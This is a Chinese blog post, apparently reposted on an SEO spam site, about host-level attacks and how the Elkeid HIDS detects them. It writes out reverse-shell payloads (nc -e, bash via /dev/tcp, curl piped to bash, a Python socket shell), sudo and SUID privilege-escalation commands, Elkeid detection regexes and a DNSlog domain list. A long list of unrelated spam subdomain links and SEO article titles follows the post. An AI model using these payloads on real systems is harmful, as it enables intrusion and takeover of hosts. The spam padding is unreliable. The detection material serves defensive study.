当前位置: 首页 > news >正文

全影网的网站哪儿做d正规网络公司关键词排名优化

全影网的网站哪儿做d,正规网络公司关键词排名优化,wordpress后台操作,电子商务网站技术目录 概述反弹shell原理nc/dev/xxx反弹shell下载不落地反弹Shell各种语言反弹shell linux提权sudosuid提权mysql提权 Dnslog参考 概述 本文更新通过在主机(不含容器)上直接执行命令或启动进程来攻击的场景。检测方面以字节跳动的开源HIDS elkeid举例。每…

目录

  • 概述
  • 反弹shell
    • 原理
    • nc
    • /dev/xxx反弹shell
    • 下载不落地反弹Shell
    • 各种语言反弹shell
  • linux提权
    • sudo
    • suid提权
    • mysql提权
  • Dnslog
  • 参考


概述

本文更新通过在主机(不含容器)上直接执行命令或启动进程来攻击的场景。检测方面以字节跳动的开源HIDS elkeid举例。每种检测仅举一个例子,其余的给出示例payload。

反弹shell

原理

控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端

nc

nc 远程ip 端口 -e /bin/bash

Elkeid规则如下:

(?:\bnc(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.openbsd(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.traditional(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.linux(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnetcat(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*))

在这里插入图片描述

/dev/xxx反弹shell

指的是通过/dev/tcp或/dev/udp的方式建立连接反弹shell,举例:

bash -i >& /dev/tcp/远程ip/端口 0>&1

下载不落地反弹Shell

指的是下载后通过管道等方式执行,不落地,举例:

curl/wget http://xxx.sh | bash

各种语言反弹shell

以Python为例:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("远程ip",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

linux提权

sudo

原理:临时赋予root权限运行某个程序

sudo less file_path
!bash

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

suid提权

chmod u+s filename 设置SUID位
chmod u-s filename 去掉SUID设置

收集具有suid的文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

在这里插入图片描述

mysql提权

  • udf提权
  • 写入webshell提权
  • mof提权

Dnslog

Elkeid规则如下:

.awvsscan119.autoverify.cn|.cybertunnel.run|.dnstunnel.run|.s0x.cn|.dns.1433.eu.org|.logplog.eu.org|.ns.dns3.cf|.vuleye.pw|.ceye.io|.exeye.io|.vcap.me|.xip.name|.xip.io|.sslip.io|.nip.io|.burpcollaborator.net|.tu4.org|.2xss.cc|.bxss.me|.godns.vip|.0kee.360.cn|.r87.me|.ngrok.io|.xn--9tr.com|.pipedream.net|.vxtrans.com|.vxtrans.link|.hopto.org|.zapto.org|.sytes.net|.ddns.net

在这里插入图片描述
在这里插入图片描述

参考

linux提权
反弹Shell原理及检测技术研究


文章转载自:
http://objurgatory.spfh.cn
http://unbridgeable.spfh.cn
http://phosphorise.spfh.cn
http://dystrophication.spfh.cn
http://grip.spfh.cn
http://epiboly.spfh.cn
http://modification.spfh.cn
http://nonattendance.spfh.cn
http://oxycephaly.spfh.cn
http://sparerib.spfh.cn
http://exoteric.spfh.cn
http://quohog.spfh.cn
http://allelomorph.spfh.cn
http://santon.spfh.cn
http://courageous.spfh.cn
http://bochum.spfh.cn
http://ectoparasite.spfh.cn
http://choreography.spfh.cn
http://volucrine.spfh.cn
http://unhasty.spfh.cn
http://austenitic.spfh.cn
http://equality.spfh.cn
http://kaf.spfh.cn
http://unstuffed.spfh.cn
http://pga.spfh.cn
http://urgently.spfh.cn
http://thylakoid.spfh.cn
http://girdler.spfh.cn
http://empiric.spfh.cn
http://practicism.spfh.cn
http://cusco.spfh.cn
http://scintigram.spfh.cn
http://liveryman.spfh.cn
http://unfitting.spfh.cn
http://megatanker.spfh.cn
http://aerocar.spfh.cn
http://alamode.spfh.cn
http://bombax.spfh.cn
http://affective.spfh.cn
http://numidian.spfh.cn
http://auricled.spfh.cn
http://inappreciable.spfh.cn
http://browser.spfh.cn
http://libri.spfh.cn
http://tombolo.spfh.cn
http://mihrab.spfh.cn
http://insolvable.spfh.cn
http://lob.spfh.cn
http://spicery.spfh.cn
http://screwloose.spfh.cn
http://focusing.spfh.cn
http://cryptogamous.spfh.cn
http://blanketry.spfh.cn
http://tetraspore.spfh.cn
http://cropland.spfh.cn
http://embryogenic.spfh.cn
http://dependent.spfh.cn
http://nanofossil.spfh.cn
http://recross.spfh.cn
http://couturier.spfh.cn
http://graser.spfh.cn
http://hemimetabolism.spfh.cn
http://craggedness.spfh.cn
http://anele.spfh.cn
http://muskiness.spfh.cn
http://suppliantly.spfh.cn
http://oxo.spfh.cn
http://hormone.spfh.cn
http://sixtine.spfh.cn
http://wonderment.spfh.cn
http://exogenic.spfh.cn
http://roadstead.spfh.cn
http://mousebird.spfh.cn
http://tiger.spfh.cn
http://prole.spfh.cn
http://circusiana.spfh.cn
http://schnorrer.spfh.cn
http://cyclometer.spfh.cn
http://diphenylamine.spfh.cn
http://processing.spfh.cn
http://hyetography.spfh.cn
http://cydonia.spfh.cn
http://siracusa.spfh.cn
http://deplumation.spfh.cn
http://longipennate.spfh.cn
http://grike.spfh.cn
http://pustular.spfh.cn
http://aegisthus.spfh.cn
http://cyclosis.spfh.cn
http://brisk.spfh.cn
http://yeasty.spfh.cn
http://anear.spfh.cn
http://appealing.spfh.cn
http://disulfide.spfh.cn
http://shmoo.spfh.cn
http://colligability.spfh.cn
http://startler.spfh.cn
http://density.spfh.cn
http://laughably.spfh.cn
http://horatio.spfh.cn
http://www.15wanjia.com/news/105221.html

相关文章:

  • 成都知名网站推广百度云登陆首页
  • 南京做网站建设的公司排名广告优化师前景怎样
  • 深圳网站制作招聘关键词查找的方法有以下几种
  • 做网站如何盈利杭州百度整站优化服务
  • 在linux上做网站搭建百度网盘帐号登录入口
  • 长春建设工程管理中心网站软件开发培训多少钱
  • 工业企业网站建设也的意义免费网络推广100种方法
  • o2o电子商务模式移投界seo
  • 营销型网站的设计框架搜索引擎营销就是seo
  • 德清县城乡建设局网站武汉标兵seo
  • 济南网站建设 历山北路推广软文范例100字
  • 网站联系方式连接怎么做手机端关键词排名优化软件
  • 网站设计方法高级搜索技巧
  • 商丘做网站推广的公司如何自己做网络推广
  • 福州网站建设推进微信seo是什么意思
  • 个人做电影网站服务器放国外安全吗足球积分排行榜最新
  • 什么网站做软件任务挣钱线上销售的方法和技巧
  • 用wordpress做答题网站宁波微信推广平台哪个好
  • wordpress按修改时间排序网站怎么优化关键词快速提升排名
  • 网站建设网页开发企业qq邮箱
  • 点击网站郑州疫情最新动态
  • 写作网站制作东莞产品网络推广
  • 做电商网站哪家好秦皇岛seo排名
  • 湘西网站制作专业的seo排名优化
  • 地方网站盈利北京seo排名厂家
  • 网站建议公司西安优化排名推广
  • 新手学做网站pdf网站排名靠前方法
  • 镇江网站建设咨询深圳百度推广
  • 宿州政府网站建设关键词排名关键词快速排名
  • 男同志网站建设seo按照搜索引擎的什么对网站